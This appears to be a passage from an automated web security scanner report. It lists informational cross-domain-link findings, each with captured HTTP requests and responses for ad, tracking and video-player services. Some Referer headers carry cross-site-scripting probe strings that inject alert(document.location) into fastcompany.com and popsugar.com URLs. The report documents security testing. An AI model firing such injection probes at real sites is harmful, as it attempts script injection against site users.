Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://seg.sharethis.com/adxmapping.php?stid=i-048AA00A35CF5E4EC53E553302EE710A&google_error=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 12 Sep 2011 12:40:55 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 295
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://seg.sharethis.com/adxmapping.php?stid=i-048AA00A35CF5E4EC53E553302EE710A&amp;google_error=1">here</A>
...[SNIP]...
11.31. http://cm.npc-morris.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-morris.overture.com
Path:   /js_1_0/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.css&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547 HTTP/1.1
Host: cm.npc-morris.overture.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMjSyNnCxMAY6dMoAw=

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyNHF0dXZ2cAN%2bpN%2bAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 09-Sep-2021 12:48:41 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4627


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
</title>

<link rel="stylesheet" href="http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.css" type="text/css">
<style type="text/css">
...[SNIP]...
<div style="overflow:hidden; height:14px;"><a href="http://info.yahoo.com/services/us/yahoo/ads/details.html" target="_blank" class="title">Ads by Yahoo!</a>
...[SNIP]...
11.32. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9403877655681298&output=html&h=60&slotname=5036914312&w=468&lmt=1315843993&flash=10.3.183&url=http%3A%2F%2Fdrupalsn.com%2F&dt=1315849749654&bpp=44&shv=r20110831&jsv=r20110719&correlator=1315849749769&frm=4&adk=705581515&ga_vid=147367049.1315849750&ga_sid=1315849750&ga_hid=312841290&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=13&biw=1155&bih=870&ref=http%3A%2F%2Fdrupal.org%2Fcases&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=143&xpc=m9E2awq0fJ&p=http%3A//drupalsn.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 12 Sep 2011 12:48:53 GMT
Server: cafe
Cache-Control: private
Content-Length: 4152
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://drupalsn.com/%26hl%3Den%26client%3Dca-pub-9403877655681298%26adU%3Dwww.Spigit.com/SharePoint%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEJJLszjZwoQSkc20ynf63vgnED5g" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...
11.33. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9403877655681298&output=html&h=250&slotname=2673726471&w=250&lmt=1315843993&flash=10.3.183&url=http%3A%2F%2Fdrupalsn.com%2F&dt=1315849751048&bpp=162&shv=r20110831&jsv=r20110719&prev_slotnames=5036914312%2C5036914312&correlator=1315849749769&frm=4&adk=3483465846&ga_vid=147367049.1315849750&ga_sid=1315849750&ga_hid=312841290&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=13&biw=1139&bih=870&ref=http%3A%2F%2Fdrupal.org%2Fcases&prodhost=googleads.g.doubleclick.net&fu=0&ifi=3&dtd=171&xpc=PT5wpNUoRY&p=http%3A//drupalsn.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 12 Sep 2011 12:48:54 GMT
Server: cafe
Cache-Control: private
Content-Length: 3901
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://drupalsn.com/%26hl%3Den%26client%3Dca-pub-9403877655681298%26adU%3Dlynda.com/Learn_Drupal%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGuO3OpW1qu4FgwG1yZWDvCVZQH9Q" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...
11.34. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9403877655681298&output=html&h=60&slotname=5036914312&w=468&lmt=1315843993&flash=10.3.183&url=http%3A%2F%2Fdrupalsn.com%2F&dt=1315849750942&bpp=37&shv=r20110831&jsv=r20110719&prev_slotnames=5036914312&correlator=1315849749769&frm=4&adk=282862421&ga_vid=147367049.1315849750&ga_sid=1315849750&ga_hid=312841290&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=13&adx=193&ady=554&biw=1155&bih=870&eid=36887102&ref=http%3A%2F%2Fdrupal.org%2Fcases&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=41&xpc=FKc0jZYiI6&p=http%3A//drupalsn.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 12 Sep 2011 12:48:53 GMT
Server: cafe
Cache-Control: private
Content-Length: 3820
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://drupalsn.com/%26hl%3Den%26client%3Dca-pub-9403877655681298%26adU%3Dwww.Artisteer.com/Drupal%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEQFb16S3OSMSWz4c1vGE9I8mtAdQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...
11.35. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3717378713686065&output=html&h=60&slotname=2121162070&w=468&lmt=1315849707&flash=10.3.183&url=http%3A%2F%2Fmydirtbike.com%2F&dt=1315849730940&bpp=207&shv=r20110831&jsv=r20110719&prev_slotnames=8977042794&correlator=1315849731256&frm=4&adk=1914620364&ga_vid=879222618.1315849731&ga_sid=1315849731&ga_hid=1703698942&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=droid%20sans&dfs=12&adx=576&ady=1925&biw=1139&bih=870&eid=36887102&ref=http%3A%2F%2Fdrupal.org%2Fcases&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=442&xpc=5FpE3kRdNR&p=http%3A//mydirtbike.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 12 Sep 2011 12:48:34 GMT
Server: cafe
Cache-Control: private
Content-Length: 3878
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://mydirtbike.com/%26hl%3Den%26client%3Dca-pub-3717378713686065%26adU%3Dwww.vGameNetwork.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFKBokuYZKnduBflwlj2Mhb-ZvjPA" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110831/r20110719/abg.js"></script>
...[SNIP]...
11.36. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3717378713686065&output=html&h=60&slotname=8977042794&w=468&lmt=1315849707&flash=10.3.183&url=http%3A%2F%2Fmydirtbike.com%2F&dt=1315849730845&bpp=68&shv=r20110831&jsv=r20110719&correlator=1315849731256&frm=4&adk=1877545330&ga_vid=879222618.1315849731&ga_sid=1315849731&ga_hid=1703698942&ga_fc=0&ga_wpids=UA-314227-1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=droid%20sans&dfs=12&biw=1139&bih=870&eid=36887101&ref=http%3A%2F%2Fdrupal.org%2Fcases&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=494&xpc=6pNCtgm6LR&p=http%3A//mydirtbike.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 12 Sep 2011 12:48:34 GMT
Server: cafe
Cache-Control: private
Content-Length: 4383
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://mydirtbike.com/%26hl%3Den%26client%3Dca-pub-3717378713686065%26adU%3Dwww.honda.com%26adT%3DJeremy%2BMcGrath%2BHonda%2BFilm%26gl%3DUS&amp;usg=AFQjCNE9xJZxM64yAt0n988nHaa69Qq-FA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
11.37. http://l.yimg.com/zz/combo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /zz/combo

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/169/search-min.js HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://research.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Last-Modified: Mon, 12 Sep 2011 00:04:33 GMT
Content-Type: application/x-javascript
Expires: Sun, 30 Aug 2020 16:22:48 GMT
Date: Mon, 12 Sep 2011 00:04:33 GMT
Age: 45853
Content-Length: 19657
Server: YTS/1.19.5
Proxy-Connection: keep-alive

if(!window.ucs){window.ucs={};}YUI.add("ucs-skip-to-search",function(A){A.namespace("ucs");A.ucs.SkipToSearch=function(B){this.skipLink=B;this.init();};A.ucs.SkipToSearch.prototype={init:function(){th
...[SNIP]...
);},_hidePanel:function(C){C.halt();var B=this.container.one("div.yucs-sethp-panel"),D=this.container.one("div.pnt");D.addClass("hide");B.addClass("hide");},_loadBeacon:function(){var B=A.Node.create('<img width="0" height="0" src="http://us.lrd.yahoo.com/_ylc=X3oDMTFnNzFiMTJoBHRtX2RtZWNoA1RleHQgTGluawR0bV9sbmsDVTExMzA1NTYEdG1fbmV0A1lhaG9vIQ--/SIG=112cgufir/**http%3A/www.yahoo.com/%3Fmkt=3"/>');this.container.insert(B);},_setHpIe:function(C){C.halt();this.anchor.setStyle("behavior","url(#default#homepage)");this.anchor._node.setHomePage(this.container.one("a.yucs-sethp-panel-logo").getAttr
...[SNIP]...
11.38. http://p.raasnet.com/partners/universal/in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/universal/in

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:06 GMT;
Content-Type: text/html
Content-Length: 207
Date: Mon, 12 Sep 2011 13:06:06 GMT
Connection: close

<img border='0' width='1' height='1' src='http://p.raasnet.com/partners/exelate'/><img border='0' width='1' height='1' src='http://rd.rlcdn.com/rd?site=43881&type=redir&url=http://dts1.raasnet.com/dts/rpf'/>
11.39. http://player.ooyala.com/player.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /player.js?autoplay=0&width=900&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&height=506&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr HTTP/1.1
Host: player.ooyala.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 12 Sep 2011 13:01:56 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-9d79a4f1
X-Pad: avoid browser bug
Content-Length: 26435
Cache-Control: private, max-age=300
Date: Mon, 12 Sep 2011 13:01:57 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
<td align="center"><a href="http://www.adobe.com/go/getflash/" style="color:white"><span style="font-size:12px">
...[SNIP]...
11.40. http://player.popsugar.com/player.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.popsugar.com
Path:   /player.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /player.js?autoplay=0&width=900&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&height=506&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr HTTP/1.1
Host: player.popsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D

Response

HTTP/1.1 302 Found
Date: Mon, 12 Sep 2011 13:01:54 GMT
Server: Apache
Location: http://player.ooyala.com/player.js?autoplay=0&width=900&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&height=506&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr
Content-Length: 360
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://player.ooyala.com/player.js?autoplay=0&amp;width=900&amp;deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&amp;height=506&amp;embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr">here</a>
...[SNIP]...
11.41. http://player.vimeo.com/video/19872101  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.vimeo.com
Path:   /video/19872101

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /video/19872101?title=0&byline=0&portrait=0 HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=256147786.803795514.1314813682.1314847150.1314978007.3; __utmz=256147786.1314978007.3.3.utmcsr=blog.sipvicious.org|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.119
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 8996
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Cargoh Artist Profile - Indigo</title><!--[if lt IE 9]><style>.a.d .z {display: block;}.a.d .bj {background: #000;filter: alpha(opacit
...[SNIP]...
</style><link rel="stylesheet" href="http://a.vimeocdn.com/p/1.4.0/css/player.core.opt.css"><script src="http://a.vimeocdn.com/p/1.4.0/js/player.core.opt.js"></script>
...[SNIP]...
11.42. http://seg.sharethis.com/getSegment.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.dome9.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
